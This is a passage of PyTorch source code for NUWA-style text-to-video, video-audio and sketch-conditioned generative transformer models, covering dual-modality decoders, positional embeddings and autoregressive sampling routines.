False), *attn_context_layer) * depth\n\n context_route_map = {'context': route_context, 'context_mask': route_context} if cross_attend else {}\n attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn}\n\n self.net = ReversibleSequence(self.layers, args_route = {**context_route_map, **attn_route_map})\n self.norm = StableLayerNorm(dim)\n\n def forward(\n self,\n x,\n **kwargs\n ):\n x = self.net(x, **kwargs)\n return self.norm(x)\n\n# dual modality decoder (for video and audio synthesis)\n\nclass DualModalityDecoder(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n num_audio_tokens_per_video_frame,\n num_video_tokens_per_frame,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n cross_modality_attn_every = 3\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n\n self.layers = MList([])\n self.layer_types = []\n\n def intra_modality_attn(sparse_3dna_attn):\n if sparse_3dna_attn:\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n\n self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n else:\n self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n dropout = attn_dropout\n )\n\n cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n ff = FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n if sparse_3dna_attn and shift_video_tokens:\n fmap_size = sparse_3dna_video_shape[-1]\n self_attn = ShiftVideoTokens(self_attn, image_size = fmap_size)\n ff = ShiftVideoTokens(ff, image_size = fmap_size)\n\n return MList([\n SandwichNorm(dim = dim, fn = self_attn),\n SandwichNorm(dim = dim, fn = cross_attn),\n SandwichNorm(dim = dim, fn = ff)\n ])\n\n def inter_modality_attn(chunk_size, context_chunk_size):\n cross_modality_attn = CrossModalityCrossAttention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n chunk_size = chunk_size,\n context_chunk_size = context_chunk_size,\n has_start_token = True,\n context_has_start_token = True\n )\n\n cross_modality_ff = FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n return MList([\n SandwichNorm(dim = dim, fn = cross_modality_attn),\n SandwichNorm(dim = dim, fn = cross_modality_ff),\n ])\n\n for ind in range(depth):\n video_modality_attn = intra_modality_attn(sparse_3dna_attn = sparse_3dna_attn)\n audio_modality_attn = intra_modality_attn(sparse_3dna_attn = False)\n\n self.layer_types.append('intra_modality')\n\n self.layers.append(MList([\n video_modality_attn,\n audio_modality_attn,\n ]))\n\n if ((ind + 1) % cross_modality_attn_every) == 0:\n self.layer_types.append('inter_modality')\n\n video_to_audio_attn = inter_modality_attn(num_video_tokens_per_frame, num_audio_tokens_per_video_frame)\n audio_to_video_attn = inter_modality_attn(num_audio_tokens_per_video_frame, num_video_tokens_per_frame)\n\n self.layers.append(MList([\n video_to_audio_attn,\n audio_to_video_attn\n ]))\n\n self.video_norm = StableLayerNorm(dim)\n self.audio_norm = StableLayerNorm(dim)\n\n def forward(\n self,\n video,\n audio,\n *,\n context,\n audio_mask = None,\n video_mask = None,\n context_mask = None,\n **kwargs\n ):\n for blocks, layer_type in zip(self.layers, self.layer_types):\n if layer_type == 'intra_modality':\n (video_self_attn, video_cross_attn, video_ff), (audio_self_attn, audio_cross_attn, audio_ff) = blocks\n\n video_ = video_self_attn(video, mask = video_mask) + video\n video_ = video_cross_attn(video_, context = context, mask = video_mask, context_mask = context_mask) + video_\n video_ = video_ff(video_) + video_\n\n audio_ = audio_self_attn(audio, mask = audio_mask) + audio\n audio_ = audio_cross_attn(audio_, context = context, mask = audio_mask, context_mask = context_mask) + audio_\n audio_ = audio_ff(audio_) + audio_\n\n elif layer_type == 'inter_modality':\n (video_to_audio_attn, video_ff), (audio_to_video_attn, audio_ff) = blocks\n\n video_ = video_to_audio_attn(\n video,\n context = audio,\n mask = video_mask,\n context_mask = audio_mask\n ) + video\n\n audio_ = audio_to_video_attn(\n audio,\n context = video,\n mask = audio_mask,\n context_mask = video_mask\n ) + audio\n\n video_ = video_ff(video_) + video_\n audio_ = audio_ff(audio_) + audio_\n else:\n raise ValueError(f'unknown layer type {layer_type}')\n\n video, audio = video_, audio_\n\n return self.video_norm(video), self.audio_norm(audio)\n\nclass ReversibleDualModalityDecoder(nn.Module):\n def __init__(\n self,\n *,\n dim,\n depth,\n num_audio_tokens_per_video_frame,\n num_video_tokens_per_frame,\n heads = 8,\n dim_head = 64,\n ff_mult = 4,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n sparse_3dna_attn = False,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_video_shape = None,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilations = (1,),\n shift_video_tokens = False,\n cross_modality_attn_every = 3\n ):\n super().__init__()\n assert not (sparse_3dna_attn and not exists(sparse_3dna_video_shape)), 'sparse_3dna_video_shape must be defined if turned on'\n\n self.layers = MList([])\n self.layer_types = []\n\n norm_wrapper = lambda fn: SandwichNorm(dim = dim, fn = fn)\n create_ff = lambda: FeedForward(dim = dim, mult = ff_mult, dropout = ff_dropout, chunk_size = ff_chunk_size)\n\n for ind in range(depth):\n dilation = sparse_3dna_dilations[ind % len(sparse_3dna_dilations)]\n\n video_self_attn = Sparse3DNA(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n kernel_size = sparse_3dna_kernel_size,\n dilation = dilation,\n video_shape = sparse_3dna_video_shape,\n query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n\n audio_self_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n causal = True,\n dropout = attn_dropout\n )\n\n video_ff = create_ff()\n audio_ff = create_ff()\n\n if sparse_3dna_attn and shift_video_tokens:\n fmap_size = sparse_3dna_video_shape[-1]\n video_self_attn = ShiftVideoTokens(video_self_attn, image_size = fmap_size)\n video_ff = ShiftVideoTokens(video_ff, image_size = fmap_size)\n\n self.layers.append(MList([\n norm_wrapper(video_self_attn),\n norm_wrapper(video_ff),\n norm_wrapper(audio_self_attn),\n norm_wrapper(audio_ff)\n ]))\n\n self.layer_types.append('intra_modality_self_attn')\n\n video_cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n audio_cross_attn = Attention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n dropout = attn_dropout\n )\n\n video_cross_ff = create_ff()\n audio_cross_ff = create_ff()\n\n self.layers.append(MList([\n norm_wrapper(video_cross_attn),\n norm_wrapper(video_cross_ff),\n norm_wrapper(audio_cross_attn),\n norm_wrapper(audio_cross_ff)\n ]))\n\n self.layer_types.append('intra_modality_cross_attn')\n\n if ((ind + 1) % cross_modality_attn_every) == 0:\n video_to_audio_attn = CrossModalityCrossAttention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n chunk_size = num_video_tokens_per_frame,\n context_chunk_size = num_audio_tokens_per_video_frame,\n has_start_token = True,\n context_has_start_token = True\n )\n\n video_cross_modality_ff = create_ff()\n\n audio_to_video_attn = CrossModalityCrossAttention(\n dim = dim,\n heads = heads,\n dim_head = dim_head,\n chunk_size = num_audio_tokens_per_video_frame,\n context_chunk_size = num_video_tokens_per_frame,\n has_start_token = True,\n context_has_start_token = True\n )\n\n audio_cross_modality_ff = create_ff()\n\n self.layers.append(MList([\n video_to_audio_attn,\n video_cross_modality_ff,\n audio_to_video_attn,\n audio_cross_modality_ff\n ]))\n\n self.layer_types.append('inter_modality_cross_attn')\n\n self.net = DualModalityReversibleSequence(self.layers, self.layer_types)\n\n self.video_norm = StableLayerNorm(dim)\n self.audio_norm = StableLayerNorm(dim)\n\n def forward(\n self,\n video,\n audio,\n *,\n context,\n audio_mask = None,\n video_mask = None,\n context_mask = None,\n **kwargs\n ):\n video, audio = self.net(\n video,\n audio,\n context = context,\n audio_mask = audio_mask,\n video_mask = video_mask,\n context_mask = context_mask\n )\n\n return self.video_norm(video), self.audio_norm(audio)\n\n# embeddings\n\nclass Embedding(nn.Module):\n def __init__(self, *shape, frac_gradient = 1.):\n super().__init__()\n self.frac_gradient = frac_gradient\n self.embed = nn.Embedding(*shape)\n\n def forward(self, x):\n x = self.embed(x)\n\n if self.training and self.frac_gradient < 1:\n x = frac_gradient(x, self.frac_gradient)\n\n return x\n\n# positional embedding\n\nclass AxialPositionalEmbedding(nn.Module):\n def __init__(\n self,\n dim,\n *,\n shape\n ):\n super().__init__()\n self.dim = dim\n frames, height, width = shape\n self.pos_frames = nn.Parameter(torch.randn(frames, dim))\n self.pos_height = nn.Parameter(torch.randn(height, dim))\n self.pos_width = nn.Parameter(torch.randn(width, dim))\n\n def forward(self):\n pos_frames = rearrange(self.pos_frames, 'f d -> f 1 1 d')\n pos_height = rearrange(self.pos_height, 'h d -> 1 h 1 d')\n pos_width = rearrange(self.pos_width, 'w d -> 1 1 w d')\n positions = pos_frames + pos_height + pos_width\n return rearrange(positions, 'f h w d -> 1 (f h w) d')\n\n# sampling helpers\n\ndef top_k(logits, thres = 0.5):\n num_logits = logits.shape[-1]\n k = max(int((1 - thres) * num_logits), 1)\n val, ind = torch.topk(logits, k)\n probs = torch.full_like(logits, float('-inf'))\n probs.scatter_(1, ind, val)\n return probs\n\n# main class\n\nclass NUWA(nn.Module):\n def __init__(\n self,\n *,\n vae,\n dim,\n image_size,\n max_video_frames = 5,\n text_num_tokens,\n text_max_seq_len = 256,\n text_enc_depth = 6,\n text_enc_dim_head = 64,\n text_enc_heads = 8,\n text_rotary_pos_emb = True,\n enc_reversible = False,\n dec_depth = 6,\n dec_dim_head = 64,\n dec_heads = 8,\n dec_reversible = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n embed_gradient_frac = 0.2,\n shift_video_tokens = True,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilation = 1,\n ):\n super().__init__()\n self.vae = vae\n vae_num_layers = vae.num_layers\n num_image_tokens = vae.codebook_size\n\n self.text_max_seq_len = text_max_seq_len\n self.text_embedding = Embedding(text_num_tokens, dim, frac_gradient = embed_gradient_frac)\n\n # positional embedding for text\n\n self.text_abs_pos_emb = Embedding(text_max_seq_len, dim) if not text_rotary_pos_emb else None\n self.text_rotary_pos_emb = RotaryEmbedding(dim = min(32, text_enc_dim_head)) if text_rotary_pos_emb else None\n\n enc_transformer_klass = Transformer if not enc_reversible else ReversibleTransformer\n\n self.text_transformer = enc_transformer_klass(\n dim = dim,\n depth = text_enc_depth,\n heads = text_enc_heads,\n dim_head = text_enc_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n rotary_pos_emb = text_rotary_pos_emb\n )\n\n self.video_bos = nn.Parameter(torch.randn(dim))\n self.image_embedding = Embedding(num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n\n fmap_size = image_size // (2 ** vae_num_layers)\n\n self.video_fmap_size = fmap_size\n self.max_video_frames = max_video_frames\n video_shape = (max_video_frames, fmap_size, fmap_size)\n\n self.video_pos_emb = AxialPositionalEmbedding(dim, shape = video_shape)\n\n # cycle dilation for sparse 3d-nearby attention\n\n sparse_3dna_dilations = tuple(range(1, sparse_3dna_dilation + 1)) if not isinstance(sparse_3dna_dilation, (list, tuple)) else sparse_3dna_dilation\n\n dec_transformer_klass = Transformer if not dec_reversible else ReversibleTransformer\n\n self.video_transformer = dec_transformer_klass(\n dim = dim,\n depth = dec_depth,\n heads = dec_heads,\n dim_head = dec_dim_head,\n causal = True,\n cross_attend = True,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n ff_chunk_size = ff_chunk_size,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = video_shape,\n sparse_3dna_attn = True,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk\n )\n\n self.to_logits = nn.Linear(dim, num_image_tokens)\n\n def embed_text(self, text, mask = None):\n batch, seq_len, device = *text.shape, text.device\n assert seq_len <= self.text_max_seq_len, 'your input text has a greater length than what was designated on initialization'\n\n tokens = self.text_embedding(text)\n\n if exists(self.text_abs_pos_emb):\n pos_emb = self.text_abs_pos_emb(torch.arange(seq_len, device = device))\n tokens = tokens + rearrange(pos_emb, 'n d -> 1 n d')\n\n rotary_pos_emb = None\n if exists(self.text_rotary_pos_emb):\n rotary_pos_emb = self.text_rotary_pos_emb(seq_len, device = device)\n\n return self.text_transformer(\n tokens,\n mask = mask,\n rotary_pos_emb = rotary_pos_emb\n )\n\n @torch.no_grad()\n @eval_decorator\n def generate(\n self,\n *,\n text,\n filter_thres = 0.9,\n temperature = 1.,\n decode_max_batchsize = 10,\n cond_scale = 2.,\n num_frames = None\n ):\n batch, seq_len, device = *text.shape, text.device\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n\n video_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n\n num_tokens_per_frame = self.video_fmap_size ** 2\n\n num_frames = default(num_frames, self.max_video_frames)\n total_video_tokens = num_tokens_per_frame * num_frames\n max_video_tokens = num_tokens_per_frame * self.max_video_frames\n\n pos_emb = self.video_pos_emb()\n\n for ind in range(total_video_tokens):\n video_indices_input = video_indices\n\n num_video_tokens = video_indices.shape[1]\n if num_video_tokens > max_video_tokens:\n curr_frame_tokens = num_video_tokens % num_tokens_per_frame\n lookback_tokens = (self.max_video_frames - (0 if curr_frame_tokens == 0 else 1)) * num_tokens_per_frame + curr_frame_tokens\n video_indices_input = video_indices[:, -lookback_tokens:]\n\n frame_embeddings = self.image_embedding(video_indices_input)\n frame_embeddings = pos_emb[:, :frame_embeddings.shape[1]] + frame_embeddings\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if cond_scale != 1:\n # discovery by Katherine Crowson\n # https://twitter.com/RiversHaveWings/status/1478093658716966912\n uncond_frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = text_embeds,\n context_mask = torch.zeros_like(text_mask).bool()\n )\n\n uncond_logits = self.to_logits(uncond_frame_embeddings)\n logits = uncond_logits + (logits - uncond_logits) * cond_scale\n\n logits = logits[:, -1, :]\n\n filtered_logits = top_k(logits, thres = filter_thres)\n sample = gumbel_sample(filtered_logits, temperature = temperature, dim = -1)\n sample = rearrange(sample, 'b -> b 1')\n video_indices = torch.cat((video_indices, sample), dim = 1)\n\n codes = self.vae.codebook[video_indices]\n codes = rearrange(codes, 'b (f h w) d -> (b f) d h w', h = self.video_fmap_size, w = self.video_fmap_size)\n\n image_reconstructions = batch_process(codes, self.vae.decode, chunks = decode_max_batchsize)\n video = rearrange(image_reconstructions, '(b f) d h w -> b f d h w', b = batch)\n return video\n\n def forward(\n self,\n *,\n text,\n video = None,\n return_loss = False,\n cond_dropout_prob = 0.2\n ):\n batch, seq_len, frames, device = *text.shape, video.shape[1], text.device\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n assert frames == self.max_video_frames, f'you must give the full video frames ({self.max_video_frames}) during training'\n\n frame_indices = self.vae.get_video_indices(video)\n frame_indices = rearrange(frame_indices, 'b ... -> b (...)')\n frame_indices_input = frame_indices[:, :-1] if return_loss else frame_indices\n\n frame_embeddings = self.image_embedding(frame_indices_input)\n frame_embeddings = self.video_pos_emb()[:, :-1] + frame_embeddings\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n if self.training and cond_dropout_prob > 0:\n # dropout condition randomly\n # presented in https://openreview.net/forum?id=qw8AKxfYbI\n uncond_mask = prob_mask_like((batch,), cond_dropout_prob, device = device)\n text_mask *= rearrange(~uncond_mask, 'b -> b 1')\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if not return_loss:\n return logits\n\n loss = F.cross_entropy(rearrange(logits, 'b n c -> b c n'), frame_indices)\n return loss\n\n# generating video and audio\n\nclass NUWAVideoAudio(nn.Module):\n def __init__(\n self,\n *,\n vae,\n dim,\n image_size,\n num_audio_tokens,\n num_audio_tokens_per_video_frame,\n max_video_frames = 5,\n text_num_tokens,\n text_max_seq_len = 256,\n text_enc_depth = 6,\n text_enc_dim_head = 64,\n text_enc_heads = 8,\n text_rotary_pos_emb = False,\n enc_reversible = False,\n dec_reversible = True,\n dec_depth = 6,\n dec_dim_head = 64,\n dec_heads = 8,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n embed_gradient_frac = 0.2,\n shift_video_tokens = True,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_query_num_frames_chunk = None,\n sparse_3dna_dilation = 1,\n audio_loss_weight = 1.,\n cross_modality_attn_every = 3\n ):\n super().__init__()\n self.vae = vae\n vae_num_layers = vae.num_layers\n num_image_tokens = vae.codebook_size\n\n self.text_max_seq_len = text_max_seq_len\n self.text_embedding = Embedding(text_num_tokens, dim, frac_gradient = embed_gradient_frac)\n\n self.text_abs_pos_emb = Embedding(text_max_seq_len, dim) if not text_rotary_pos_emb else None\n self.text_rotary_pos_emb = RotaryEmbedding(dim = min(32, text_enc_dim_head)) if text_rotary_pos_emb else None\n\n enc_transformer_klass = Transformer if not enc_reversible else ReversibleTransformer\n\n self.text_transformer = enc_transformer_klass(\n dim = dim,\n depth = text_enc_depth,\n heads = text_enc_heads,\n dim_head = text_enc_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout\n )\n\n # video related params\n\n self.video_bos = nn.Parameter(torch.randn(dim))\n self.image_embedding = Embedding(num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n\n fmap_size = image_size // (2 ** vae_num_layers)\n\n self.video_fmap_size = fmap_size\n self.max_video_frames = max_video_frames\n video_shape = (max_video_frames, fmap_size, fmap_size)\n\n self.video_pos_emb = AxialPositionalEmbedding(dim, shape = video_shape)\n\n # audio related params\n\n self.audio_bos = nn.Parameter(torch.randn(dim))\n self.audio_embedding = Embedding(num_audio_tokens, dim, frac_gradient = embed_gradient_frac)\n\n max_audio_seq_len = num_audio_tokens_per_video_frame * max_video_frames\n self.audio_pos_emb = nn.Embedding(max_audio_seq_len, dim)\n\n self.audio_loss_weight = audio_loss_weight\n\n # num tokens per video frame\n\n self.num_video_tokens_per_frame = fmap_size ** 2\n self.num_audio_tokens_per_video_frame = num_audio_tokens_per_video_frame\n\n # cycle dilation for sparse 3d-nearby attention\n\n sparse_3dna_dilations = tuple(range(1, sparse_3dna_dilation + 1)) if not isinstance(sparse_3dna_dilation, (list, tuple)) else sparse_3dna_dilation\n\n decoder_klass = ReversibleDualModalityDecoder if dec_reversible else DualModalityDecoder\n\n self.video_audio_transformer = decoder_klass(\n dim = dim,\n depth = dec_depth,\n heads = dec_heads,\n dim_head = dec_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n ff_chunk_size = ff_chunk_size,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = video_shape,\n sparse_3dna_attn = True,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk,\n num_audio_tokens_per_video_frame = num_audio_tokens_per_video_frame,\n num_video_tokens_per_frame = fmap_size * fmap_size,\n cross_modality_attn_every = cross_modality_attn_every\n )\n\n self.to_video_logits = nn.Linear(dim, num_image_tokens)\n self.to_audio_logits = nn.Linear(dim, num_audio_tokens)\n\n def embed_text(self, text, mask = None):\n batch, seq_len, device = *text.shape, text.device\n assert seq_len <= self.text_max_seq_len, 'your input text has a greater length than what was designated on initialization'\n\n tokens = self.text_embedding(text)\n\n if exists(self.text_abs_pos_emb):\n pos_emb = self.text_abs_pos_emb(torch.arange(seq_len, device = device))\n tokens = tokens + rearrange(pos_emb, 'n d -> 1 n d')\n\n rotary_pos_emb = None\n if exists(self.text_rotary_pos_emb):\n rotary_pos_emb = self.text_rotary_pos_emb(seq_len, device = device)\n\n return self.text_transformer(\n tokens,\n mask = mask,\n rotary_pos_emb = rotary_pos_emb\n )\n\n @torch.no_grad()\n @eval_decorator\n def generate(\n self,\n *,\n text,\n filter_thres = 0.9,\n temperature = 1.,\n decode_max_batchsize = 10,\n cond_scale = 2.,\n num_frames = None\n ):\n batch, seq_len, device = *text.shape, text.device\n num_tokens_per_frame, num_audio_tokens_per_video_frame = self.num_video_tokens_per_frame, self.num_audio_tokens_per_video_frame\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n video_bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n audio_bos = repeat(self.audio_bos, 'd -> b 1 d', b = batch)\n\n video_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n audio_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n\n num_frames = default(num_frames, self.max_video_frames)\n\n total_video_tokens = num_frames * num_tokens_per_frame\n total_audio_tokens = num_frames * num_audio_tokens_per_video_frame\n\n video_pos_emb = self.video_pos_emb()\n\n is_decoding_video = True # toggle to False to decode audio, alternating between video and audio\n\n while video_indices.shape[1] < total_video_tokens \\\n or audio_indices.shape[1] < total_audio_tokens:\n\n video_indices_input = video_indices\n audio_indices_input = audio_indices\n\n num_video_tokens = video_indices.shape[1]\n if num_video_tokens > total_video_tokens:\n curr_frame_tokens = num_video_tokens % num_tokens_per_frame\n lookback_tokens = (self.max_video_frames - (0 if curr_frame_tokens == 0 else 1)) * num_tokens_per_frame + curr_frame_tokens\n video_indices_input = video_indices[:, -lookback_tokens:]\n\n # prep video embeddings\n\n frame_embeddings = self.image_embedding(video_indices_input)\n frame_embeddings = video_pos_emb[:, :frame_embeddings.shape[1]] + frame_embeddings\n frame_embeddings = torch.cat((video_bos, frame_embeddings), dim = 1)\n\n # prep audio embeddings\n\n audio_embeddings = self.audio_embedding(audio_indices_input)\n audio_pos_emb = self.audio_pos_emb(torch.arange(audio_embeddings.shape[1], device = device))\n audio_pos_emb = rearrange(audio_pos_emb, 'n d -> 1 n d')\n audio_embeddings = audio_embeddings + audio_pos_emb\n audio_embeddings = torch.cat((audio_bos, audio_embeddings), dim = 1)\n\n frame_embeddings, audio_embeddings = self.video_audio_transformer(\n frame_embeddings,\n audio_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n logits = self.to_video_logits(frame_embeddings) if is_decoding_video else self.to_audio_logits(audio_embeddings)\n\n if cond_scale != 1:\n # discovery by Katherine Crowson\n # https://twitter.com/RiversHaveWings/status/1478093658716966912\n uncond_frame_embeddings, uncond_audio_embeddings = self.video_audio_transformer(\n frame_embeddings,\n audio_embeddings,\n context = text_embeds,\n context_mask = torch.zeros_like(text_mask).bool()\n )\n\n uncond_logits = self.to_video_logits(uncond_frame_embeddings) if is_decoding_video else self.to_audio_logits(uncond_audio_embeddings)\n logits = uncond_logits + (logits - uncond_logits) * cond_scale\n\n logits = logits[:, -1, :]\n\n filtered_logits = top_k(logits, thres = filter_thres)\n sample = gumbel_sample(filtered_logits, temperature = temperature, dim = -1)\n sample = rearrange(sample, 'b -> b 1')\n\n if is_decoding_video:\n video_indices = torch.cat((video_indices, sample), dim = 1)\n at_frame_boundary = (video_indices.shape[1] % num_tokens_per_frame) == 0\n else:\n audio_indices = torch.cat((audio_indices, sample), dim = 1)\n at_frame_boundary = (audio_indices.shape[1] % num_audio_tokens_per_video_frame) == 0\n\n # alternate between audio and video decoding, one video frame at a time\n\n if at_frame_boundary:\n is_decoding_video = not is_decoding_video\n\n # decoding video codebook indices with VQGan\n\n codes = self.vae.codebook[video_indices]\n codes = rearrange(codes, 'b (f h w) d -> (b f) d h w', h = self.video_fmap_size, w = self.video_fmap_size)\n\n image_reconstructions = batch_process(codes, self.vae.decode, chunks = decode_max_batchsize)\n video = rearrange(image_reconstructions, '(b f) d h w -> b f d h w', b = batch)\n\n # just return audio token indices for now\n\n audio = audio_indices\n\n return video, audio\n\n def forward(\n self,\n *,\n text,\n video,\n audio,\n return_loss = False,\n cond_dropout_prob = 0.2\n ):\n batch, seq_len, frames, device = *text.shape, video.shape[1], text.device\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n # prep video representation\n\n assert frames == self.max_video_frames, f'you must give the full video frames ({self.max_video_frames}) during training'\n\n frame_indices = self.vae.get_video_indices(video)\n frame_indices = rearrange(frame_indices, 'b ... -> b (...)')\n frame_indices_input = frame_indices[:, :-1] if return_loss else frame_indices\n\n frame_embeddings = self.image_embedding(frame_indices_input)\n frame_embeddings = self.video_pos_emb()[:, :-1] + frame_embeddings\n\n video_bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n frame_embeddings = torch.cat((video_bos, frame_embeddings), dim = 1)\n\n # prep audio representations\n\n audio_indices_input = audio[:, :-1] if return_loss else audio\n\n audio_embeddings = self.audio_embedding(audio_indices_input)\n audio_pos_emb = self.audio_pos_emb(torch.arange(audio_embeddings.shape[1], device = device))\n audio_embeddings = audio_embeddings + rearrange(audio_pos_emb, 'n d -> 1 n d')\n\n audio_bos = repeat(self.audio_bos, 'd -> b 1 d', b = batch)\n audio_embeddings = torch.cat((audio_bos, audio_embeddings), dim = 1)\n\n # null conditions, for super-conditioning\n\n if self.training and cond_dropout_prob > 0:\n # dropout condition randomly\n # presented in https://openreview.net/forum?id=qw8AKxfYbI\n uncond_mask = prob_mask_like((batch,), cond_dropout_prob, device = device)\n text_mask *= rearrange(~uncond_mask, 'b -> b 1')\n\n # twin attention towers for video and audio, with efficient chunked cross modality attention\n\n frame_embeddings, audio_embeddings = self.video_audio_transformer(\n frame_embeddings,\n audio_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n video_logits = self.to_video_logits(frame_embeddings)\n audio_logits = self.to_audio_logits(audio_embeddings)\n\n if not return_loss:\n return video_logits, audio_logits\n\n video_loss = F.cross_entropy(rearrange(video_logits, 'b n c -> b c n'), frame_indices)\n audio_loss = F.cross_entropy(rearrange(audio_logits, 'b n c -> b c n'), audio)\n\n return video_loss + audio_loss * self.audio_loss_weight\n\n# main class for learning on sketches\n\nclass NUWASketch(nn.Module):\n def __init__(\n self,\n *,\n vae,\n sketch_vae,\n dim,\n image_size,\n max_video_frames = 5,\n sketch_max_video_frames = 2,\n sketch_enc_depth = 6,\n sketch_enc_dim_head = 64,\n sketch_enc_heads = 8,\n sketch_enc_use_sparse_3dna = False,\n enc_reversible = False,\n dec_depth = 6,\n dec_dim_head = 64,\n dec_heads = 8,\n dec_reversible = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n embed_gradient_frac = 0.2,\n shift_video_tokens = True,\n cross_2dna_kernel_size = 3,\n cross_2dna_dilation = 1,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_dilation = 1,\n sparse_3dna_query_num_frames_chunk = None,\n ):\n super().__init__()\n self.image_size = image_size\n\n self.sketch_vae = sketch_vae\n sketch_vae_num_layers = sketch_vae.num_layers\n sketch_num_image_tokens = sketch_vae.codebook_size\n sketch_fmap_size = image_size // (2 ** sketch_vae_num_layers)\n\n sketch_shape = (sketch_max_video_frames, sketch_fmap_size, sketch_fmap_size)\n\n self.sketch_max_video_frames = sketch_max_video_frames\n self.sketch_embedding = Embedding(sketch_num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n self.sketch_pos_emb = AxialPositionalEmbedding(dim, shape = sketch_shape)\n\n # sparse 3dna kwargs\n\n sparse_3dna_dilations = tuple(range(1, sparse_3dna_dilation + 1)) if not isinstance(sparse_3dna_dilation, (list, tuple)) else sparse_3dna_dilation\n\n # encoder\n\n enc_transformer_klass = Transformer if not enc_reversible else ReversibleTransformer\n\n self.sketch_transformer = enc_transformer_klass(\n dim = dim,\n depth = sketch_enc_depth,\n heads = sketch_enc_heads,\n dim_head = sketch_enc_dim_head,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = sketch_shape,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk,\n sparse_3dna_attn = sketch_enc_use_sparse_3dna\n )\n\n # decoder parameters\n\n self.vae = vae\n\n vae_num_layers = vae.num_layers\n num_image_tokens = vae.codebook_size\n\n self.video_bos = nn.Parameter(torch.randn(dim))\n self.image_embedding = Embedding(num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n\n fmap_size = image_size // (2 ** vae_num_layers)\n\n assert fmap_size == sketch_fmap_size, 'feature map size of video must be equal to the feature map size of sketches (VAEs must have same number of layers)'\n\n self.video_fmap_size = fmap_size\n self.max_video_frames = max_video_frames\n video_shape = 